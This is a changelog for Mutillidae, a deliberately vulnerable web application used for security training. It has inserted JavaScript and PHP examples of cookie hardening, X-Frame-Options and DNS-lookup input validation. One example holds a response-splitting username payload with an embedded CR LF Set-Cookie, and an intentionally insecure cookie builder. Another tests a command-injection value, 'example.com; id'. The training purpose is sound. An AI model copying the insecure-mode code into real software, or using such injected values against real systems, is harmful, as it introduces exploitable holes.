  • Added a new security vulnerability and counteracting secure code. Cookies are unprotected in insecure mode, but in secure mode the cookies have the HttpOnly attribute applied to them. In reality this vulnerability was always in Mutillidae, since ignoring the issue opens the vulnerability (the ability for scripts to access the cookie values). The change is acknowledging this issue and adding the defense. Once we get an SSL certificate installed, the next logical step will be to add the "Secure" attribute to cookies in secure mode, but not in insecure mode.
  • Added the X-FRAME-OPTIONS: DENY click-jacking defense in secure mode. In insecure mode, the site does nothing and ignores the issue entirely. This defense only works in newer browsers; JavaScript frame busters are needed to help older browsers.
  • Added insecure comments vulnerability and defense. Some developers use HTML or JavaScript comments, which reach the client, instead of using the framework's server-side comments (ASP.NET, Java, PHP, etc.).
  • Rearranged instructions on home page to emphasize the PHP.ini configuration changes that are needed to get rid of errors.
  • Rewrote opendb.inc to have error trapping and custom error handling. If there is an error, there will be some diagnostic information available.
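The first two entries in this release are header-level defenses that only exist in secure mode: HttpOnly on the cookie (with Secure deferred until TLS) and X-Frame-Options: DENY. The following is an added example, not Mutillidae's code, that builds those headers for both modes. It also shows the consequence the 2.1.5 username cookie invites, a CR LF in the cookie value splitting the response, and carries the old-style JavaScript frame buster the 2.1.13 anti-framing page describes for browsers that ignore the header. There is no network code; the functions return plain objects and strings so they can be exercised offline.

```javascript
// Added example, not Mutillidae's code. Builds the response headers the 2.0.6
// notes describe: in secure mode the session cookie gets HttpOnly (and Secure
// once TLS is in place), and X-Frame-Options: DENY is sent; insecure mode sends
// neither. The cookie builder also shows the header-injection (response
// splitting) consequence of writing a raw username into Set-Cookie, the
// exercise the 2.1.5 username cookie sets up, and the legacy frame buster the
// 2.1.13 page describes for browsers without X-Frame-Options. No network code;
// the functions return plain objects and strings so they run offline.

// Set-Cookie value for the username/session cookie.
function buildSessionCookie(name, value, { secure, tls = false }) {
  if (!secure) {
    // Insecure mode: raw concatenation and no attributes. Script can read the
    // cookie, and a CR LF inside the value ends this header and starts another.
    return `${name}=${value}; Path=/`;
  }
  // Secure mode: refuse header-breaking characters outright, then percent-encode
  // so ; , and whitespace cannot alter cookie parsing either.
  if (/[\r\n]/.test(name) || /[\r\n]/.test(value)) {
    throw new Error('cookie name/value must not contain CR or LF');
  }
  let cookie = `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly`;
  if (tls) cookie += '; Secure';   // deferred in the changelog until a certificate exists
  return cookie;
}

// Headers for a page response in the given mode.
function responseHeaders({ secure, tls = false, username }) {
  const headers = { 'Content-Type': 'text/html; charset=utf-8' };
  if (secure) headers['X-Frame-Options'] = 'DENY';
  if (username !== undefined) {
    headers['Set-Cookie'] = buildSessionCookie('username', username, { secure, tls });
  }
  return headers;
}

// Old-style frame buster for browsers that ignore X-Frame-Options. A fallback
// only: a hostile parent can defeat it (for example with a sandboxed iframe
// that withholds allow-top-navigation), which is why the header is the primary control.
const FRAME_BUSTER = [
  '<script>',
  'if (window.top !== window.self) {',
  '  try { window.top.location = window.self.location; }',
  '  catch (e) { document.body.innerHTML = "This page may not be framed."; }',
  '}',
  '</script>',
].join('\n');

function frameBusterSnippet(secure) {
  return secure ? FRAME_BUSTER : '';
}

// Example run: the same login in both modes, plus a response-splitting username.
const SPLIT_USERNAME = 'bob\r\nSet-Cookie: admin=1';
console.log(responseHeaders({ secure: false, username: 'bob' }));
console.log(responseHeaders({ secure: true, tls: true, username: 'bob' }));
console.log(JSON.stringify(buildSessionCookie('username', SPLIT_USERNAME, { secure: false })));
```

Modern HTTP libraries, Node's http module among them, refuse CR or LF in a header value before it reaches the wire, so the splitting shown in insecure mode mostly bites code that assembles headers by hand; the check in secure mode is there for that case. HttpOnly does not stop XSS, it only keeps document.cookie out of the attacker's reach, which is exactly why the project pairs it with output encoding elsewhere.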

04/14/2011: Jeremy Druin

Change Log for Mutillidae 2.0.5:

  • browser-info.php - Patched a bug which disabled entire page if the whois server is not reachable. Now only that one line will be disabled. Also replaced Windows style file path slashes with Unix style. Either slash will work in Windows but Linux only accepts the Unix style path else throws an error.

04/13/2011: Jeremy Druin

Change Log for Mutillidae 2.0.4:

  • user-info.php - Added XSS defenses to the output so that users cannot poison their username, password or signature to cause XSS. This only works in secure code.
  • register.php - Added XSS defenses to the output so that users cannot poison their username to cause XSS. This only works in secure code.
  • header.php - Added link to this changelog. Changed style of upper header to allow more space for logged in user text. In very small screens, the text was overlapping. Also, the size of the mascot image was reduced to give the user more screen space.
  • change-log.php - Added new XSS vulnerability for users to try.

03/30/2011: Jeremy Druin

Change Log for Mutillidae 2.0.3:

  • index.php - Added PHP version detection and altered forms caching defenses and server header information defenses to use header_remove() only if the version of PHP is at 5.3 or above. Made version string variable that contains whatever version string is for Mutillidae plus "nice" output. Samurai is going through a PHP version change to 5.3 right now and XAMPP just went through the same change. This code is meant to bridge users caught between versions.
  • header.php - Made version output simpler. header.php only outputs the header string.
  • footer.php - Added PHP version to footer output in insecure mode. In secure mode, server version is not shown.

03/25/2011: Jeremy Druin

Change Log for Mutillidae 2.0.2 Beta:

Whole site

  • Made local relative links without leading dot
  • Installed on Samurai 0.95 for testing. Found that Samurai doesn't like the leading dot in local file paths. Those were removed from the index.php page.
  • Made version a variable in index.php to make updating version string easier
  • Added new forms caching information leakage vulnerability
  • Added new vulnerability for X-Powered-By and discussed removing the Server HTTP header in comments

03/23/2011: Jeremy Druin

Change Log for Mutillidae 2.0.1 Beta:

Whole site

  • Replaced root relative links with local relative links to allow more freedom in root folder name
  • Added email address for Jeremy
  • Added change log to site
  • Added Toggle Hints into core menu but link disappears in secure mode
  • Added new failure to restrict URL access vuln

03/23/2011: Jeremy Druin

Change Log for Mutillidae 2.0 Beta:

Whole site

  • Site implements the OWASP ESAPI API for PHP including showing how to instantiate classes and call methods for output encoding.
  • Site now allows the user to switch between secure and insecure mode so the user can attempt an attack and then try the same attack against more secure code
  • All code for both modes of operation is available for inspection and includes large amounts of explanatory comments for both the insecure and secure sections. Code is commented in such a way as to help developers understand the security concepts as opposed to only seeing the PHP implementation
  • Added custom error handling to site which reacts differently depending on security mode
  • Site has larger hint sections with more hints included
  • Added menuing system for easier navigation
  • Added toolbar at top of each page for critical functions (hints, security mode, home page, etc.)
  • Converted styles to CSS
  • Collected images into single folder
  • Added links to helpful tools and sites with more information: OWASP, Toad for PHP, Eclipse PDT, Samurai WTF, and Backtrack 4 R2
  • Released new web interface design and navigation for each page
  • Installed TRY/CATCH handling in all pages

add-to-your-blog.php

  • additional reflected XSS vuln added
  • SQLi vector added
  • additional stored XSS vuln added
  • demonstrates output encoding
  • demonstrates SQLi prevention
  • non-input box attack vector added

browser-info.php

  • demonstrates safer JavaScript
  • created ClientInformationHandler class to gather client information
  • demonstrates output encoding
  • added JavaScript attack vector using innerHTML

credits.php

  • added Insecure Direct Object Reference defenses

dns-lookup.php

  • In secure mode, added strong server-side validation for the page. The page allows both IP-based and DNS-name-based attacks and includes defenses for both.
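The kind of strong server-side validation the dns-lookup.php entry above refers to, as an added example that is not Mutillidae's own dns-lookup.php code; the function names are assumptions, and the lookup target may be an IP literal or a DNS name:

```php
<?php
// Added example, not Mutillidae's dns-lookup.php. Returns the validated target or null.
// IP literals are accepted via PHP's built-in validator; host names must match the
// RFC 1123 label grammar, so anything else (spaces, quotes, ';', '&', '|', '<' ...)
// is rejected before it reaches any resolver.
function validateLookupTarget($input) {
    $target = trim((string) $input);
    if ($target === '' || strlen($target) > 253) {
        return null;
    }
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return $target; // IPv4 or IPv6 literal
    }
    // Labels: letters, digits, hyphens; no leading/trailing hyphen; max 63 chars each
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^' . $label . '(?:\.' . $label . ')*\.?$/', $target) === 1) {
        return $target;
    }
    return null;
}

// Resolve using PHP's own resolver functions on the validated value only.
function safeLookup($input) {
    $target = validateLookupTarget($input);
    if ($target === null) {
        return array('error' => 'Invalid host name or IP address');
    }
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        // Reverse lookup for IP input; gethostbyaddr returns the input on failure
        return array('target' => $target, 'ptr' => gethostbyaddr($target));
    }
    $records = dns_get_record($target, DNS_A | DNS_AAAA);
    return array('target' => $target, 'records' => $records === false ? array() : $records);
}

// Constructed inputs: the first two validate, the last two are rejected
var_dump(validateLookupTarget('192.0.2.10'));        // string "192.0.2.10"
var_dump(validateLookupTarget('www.example.com'));   // string "www.example.com"
var_dump(validateLookupTarget('example.com; id'));   // NULL
var_dump(validateLookupTarget('-bad-.example.com')); // NULL
```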

footer.php

  • added new attack vector to allow reflected XSS via HTTP headers
  • added defenses for input coming from HTTP headers
  • added comments encouraging developers to treat ALL input as evil and not just the input boxes they created

header.php

  • Replaced menu with mouseover navigation and updated menu with new attacks
  • Added new stored cross site scripting attacks and defenses
  • Added code to allow site to ignore user created cookies in secure mode and react to user created cookies in insecure mode

home.html

  • Added instructions
  • Added warning about PHP.ini files that come with new XAMPP/PHP versions 5.3 and 6.0 (future)

homenotes.php

  • Created newly formatted hints section

index.php

  • Created new processing framework
  • Added the ability to use session storage
  • Installed initialization code

login.php

  • added HTML maxlength to allow practice of circumventing trivial and useless HTML based defenses
  • Added detection of whether the user is currently logged in with new functionality. Site will auto-detect when users are logged in and change links appropriately
  • Added new reflected XSS vector

process-commands.php

  • new file which collects all "do" commands together
  • installed several new attack vectors and defenses based on the "do" commands

redirectandlog.php

  • Created new HTTP parameter pollution attack
  • Installed advanced mapping defenses with validation
  • Installed strong validation defenses

register.php

  • installed SQLi and XSS defenses
  • reformatted page with new design and error feedback

show-log.php

  • installed DOS defenses
  • added DOS attack vector
  • installed tabular output
  • added defenses for injection attacks and XSS
  • added attack vector against log

source-viewer.php/text-viewer.php

  • Added/augmented attack vectors
  • Added new attack vectors to allow loading of local server files
  • Filename injection (Insecure Direct Object Reference)
  • SQL Injection (Fix: Use Schematized Stored Procedures)
  • Cross Site Scripting (Fix: Encode all output)
  • Cross Site Request Forgery (Fix: Tokenize transactions)
  • Insecure Direct Object Reference (Fix: Tokenize Object References)
  • Denial of Service (Fix: Truncate Log Queries)
  • Loading of Local Files (Fix: Tokenize Object Reference - Filename references in this case)
  • Improper Error Handling (Fix: Employ custom error handler)
  • SQL Exception (Fix: Employ custom error handler)
  • HTTP Parameter Pollution (Fix: Scope request variables)
  • Added mapping defenses

user-info.php

  • added SQL and XSS defenses
  • added tabular output

view-someones-blog.php

  • installed SQLi and XSS defenses
  • installed trivial and useless "tokens" to let the user bypass HTML code that is meant to confuse rather than defend.